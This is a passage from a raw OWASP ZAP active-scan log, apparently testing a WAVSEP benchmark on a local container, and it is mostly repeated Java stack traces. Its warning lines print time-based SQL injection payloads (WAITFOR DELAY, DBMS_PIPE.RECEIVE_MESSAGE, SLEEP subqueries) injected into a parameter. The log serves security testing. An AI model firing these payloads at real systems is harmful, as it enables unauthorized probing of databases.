org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682459 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682459 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682460 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(120)||CHR(88)||CHR(100),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(120)||CHR(88)||CHR(100),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682461 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(74)||CHR(102)||CHR(111),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(74)||CHR(102)||CHR(111),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682462 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(69)||CHR(90)||CHR(79),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(69)||CHR(90)||CHR(79),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682463 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(105)||CHR(110)||CHR(106),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(105)||CHR(110)||CHR(106),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682463 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(116)||CHR(80)||CHR(105)||CHR(70),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(116)||CHR(80)||CHR(105)||CHR(70),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682464 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(102)||CHR(105)||CHR(84)||CHR(75),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(102)||CHR(105)||CHR(84)||CHR(75),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682465 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND (SELECT * FROM (SELECT(SLEEP(5)))FYBT) AND (4719=4719] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND (SELECT * FROM (SELECT(SLEEP(5)))FYBT) AND (4719=4719 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682466 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND (SELECT * FROM (SELECT(SLEEP(5)))XqOH)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT * FROM (SELECT(SLEEP(5)))XqOH) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682467 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND (SELECT * FROM (SELECT(SLEEP(5)))UZaD) AND ('UlFc'='UlFc] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND (SELECT * FROM (SELECT(SLEEP(5)))UZaD) AND ('UlFc'='UlFc at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682467 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND (SELECT * FROM (SELECT(SLEEP(5)))whGg) AND 'FSBC'='FSBC] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND (SELECT * FROM (SELECT(SLEEP(5)))whGg) AND 'FSBC'='FSBC at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682468 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND (SELECT * FROM (SELECT(SLEEP(5)))LoKT) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND (SELECT * FROM (SELECT(SLEEP(5)))LoKT) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682469 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection 